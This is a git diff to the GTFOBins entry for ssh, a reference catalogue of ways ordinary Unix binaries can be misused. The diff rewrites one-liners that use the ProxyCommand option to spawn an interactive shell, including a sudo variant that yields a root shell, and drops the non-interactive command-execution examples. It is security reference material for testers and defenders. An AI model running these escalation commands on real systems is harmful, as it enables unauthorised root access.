diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 5409be6..5ae09aa 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -4,19 +4,10 @@ functions:
 - description: Reconnecting may help bypassing restricted shells.
 code: ssh localhost $SHELL --noprofile --norc
 - description: Spawn interactive shell through ProxyCommand option.
- code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid
- execute-non-interactive:
- - description: The executed command output is not shown and can be redirected to a file.
- code: |
- CMD=/usr/bin/id
- ssh -o ProxyCommand="${CMD}" whatever.invalid
+ code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
 sudo-enabled:
 - description: Spawn interactive root shell through ProxyCommand option.
- code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid
- - description: The executed command output is not shown and can be redirected to a file.
- code: |
- CMD=/usr/bin/id
- sudo ssh -o ProxyCommand="${CMD}" whatever.invalid
+ code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
 download:
 - description: Fetch a remote file from a SSH server.
 code: |